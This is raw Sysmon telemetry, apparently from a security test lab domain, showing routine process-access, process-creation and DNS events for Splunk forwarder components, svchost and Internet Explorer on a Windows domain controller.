13:31:16.576{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013179Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:16.576{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013178Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:16.576{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013177Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:16.576{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013176Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:16.576{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-47A4-6000-3E05-000000009A01}6300C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013175Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:16.576{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-47A4-6000-3E05-000000009A01}6300C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013174Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:16.577{08A6967A-47A4-6000-3E05-000000009A01}6300C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013173Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:16.373{08A6967A-4754-6000-1705-000000009A01}34085132C:\Windows\Explorer.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51970|C:\Windows\System32\TwinUI.dll+144fa1|C:\Windows\System32\TwinUI.dll+14580f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013172Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:16.373{08A6967A-4754-6000-1705-000000009A01}34082820C:\Windows\Explorer.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013171Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:16.373{08A6967A-4754-6000-1705-000000009A01}34085132C:\Windows\Explorer.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+144dd9|C:\Windows\System32\TwinUI.dll+14580f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013170Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:16.357{08A6967A-4754-6000-1705-000000009A01}34082820C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013169Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:16.357{08A6967A-4754-6000-1705-000000009A01}34082820C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000013168Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:13.725{08A6967A-4781-6000-3A05-000000009A01}6928dnsdojo.com0::ffff:216.146.39.125;C:\Program Files (x86)\Internet Explorer\iexplore.exe 10341000x800000000000000013167Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:16.061{08A6967A-47A3-6000-3D05-000000009A01}53685468C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013192Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:17.889{08A6967A-4754-6000-1705-000000009A01}34085132C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51970|C:\Windows\System32\TwinUI.dll+144fa1|C:\Windows\System32\TwinUI.dll+14580f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013191Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:17.889{08A6967A-4754-6000-1705-000000009A01}34085132C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+144dd9|C:\Windows\System32\TwinUI.dll+14580f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013190Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:17.654{08A6967A-47A5-6000-3F05-000000009A01}67166808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013189Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:17.451{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-47A5-6000-3F05-000000009A01}6716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013188Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:17.451{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013187Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:17.451{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013186Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:17.451{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013185Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:17.451{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013184Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:17.451{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-47A5-6000-3F05-000000009A01}6716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013183Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:17.451{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-47A5-6000-3F05-000000009A01}6716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013182Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:17.452{08A6967A-47A5-6000-3F05-000000009A01}6716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013217Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:18.951{08A6967A-47A6-6000-4105-000000009A01}63206324C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013216Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:18.732{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-47A6-6000-4105-000000009A01}6320C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013215Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:18.732{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-47A6-6000-4105-000000009A01}6320C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013214Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:18.732{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013213Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:18.732{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013212Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:18.732{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013211Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 